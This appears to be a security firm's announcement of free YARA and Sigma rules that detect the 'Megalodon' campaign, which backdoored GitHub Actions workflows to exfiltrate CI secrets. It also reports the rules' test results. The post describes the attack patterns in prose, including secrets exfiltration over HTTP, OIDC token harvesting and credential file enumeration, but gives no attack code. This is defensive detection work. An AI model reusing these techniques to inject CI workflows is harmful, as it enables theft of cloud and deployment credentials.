Megalodon Detection Rules — Free YARA and Sigma Rules for GitHub CI/CD Backdooring

Earlier this month, the security research team at SafeDep published findings on a campaign they named Megalodon — an automated supply-chain attack that injected malicious commits into 5,561 GitHub repositories over two days in May 2026. The attacker targeted GitHub Actions workflow files, replacing or modifying them to exfiltrate CI secrets: AWS credentials, GCP access tokens, SSH private keys, Docker configs, Kubernetes configs, and GitHub OIDC tokens. In at least one case, the attack propagated into a published npm package before being detected.

SafeDep's research documented the indicators of compromise and attack patterns in detail. What was missing was scanner coverage: no existing YARA or Sigma rule sets detected Megalodon variants. We built them.

What we've released

We are publishing a set of YARA and Sigma detection rules for the Megalodon campaign under the Apache 2.0 licence — free to use, adapt, and integrate into any security tooling.

The rule set includes:

• 7 YARA rules detecting Megalodon-variant CI workflow injection patterns, including secrets exfiltration via HTTP, OIDC token harvesting, credential file enumeration, and the use of encoded payloads
• 5 Sigma rules for the same patterns, with Splunk, Elasticsearch, and OpenSearch output via sigma-cli
• A Docker-based test harness with positive and negative fixture scoring, so reliability data is published alongside the rules rather than asserted without evidence

Test results

All 7 YARA rules compile clean. 15 of 16 YARA fixture tests pass. The one known false positive — workflows using id-token: writepermissions for legitimate OIDC deployments — is documented and scored: 66.7% precision, 100% recall (F1 = 0.80). This is visible in the rule's meta block. A documented triage signal is more useful to defenders than a suppressed rule.

All 15 Sigma conversion tests pass.

Where to get the rules

The detection rules are published at github.com/Spyced-Concepts/detection-rules. The repository is Apache 2.0 licensed. Pull the rules and use them directly, or import them into your SIEM via the sigma-cli output files in megalodon/test/sigma/results/.

Attribution

The IoC intelligence behind these rules comes from SafeDep's original Megalodon research. We have notified them prior to publication and credit their work prominently in the repository. The detection rule logic — patterns, fixture design, test harness, and reliability scoring — is original work by Spyced Concepts Ltd.

What's next

We intend to submit the rules to the Neo23x0/signature-base YARA community collection and to Elastic's detection-rules repository, and to write a SANS ISC diary entry for broader community awareness.

If you have found Megalodon indicators in your environment, or if you identify patterns we've missed, get in touch.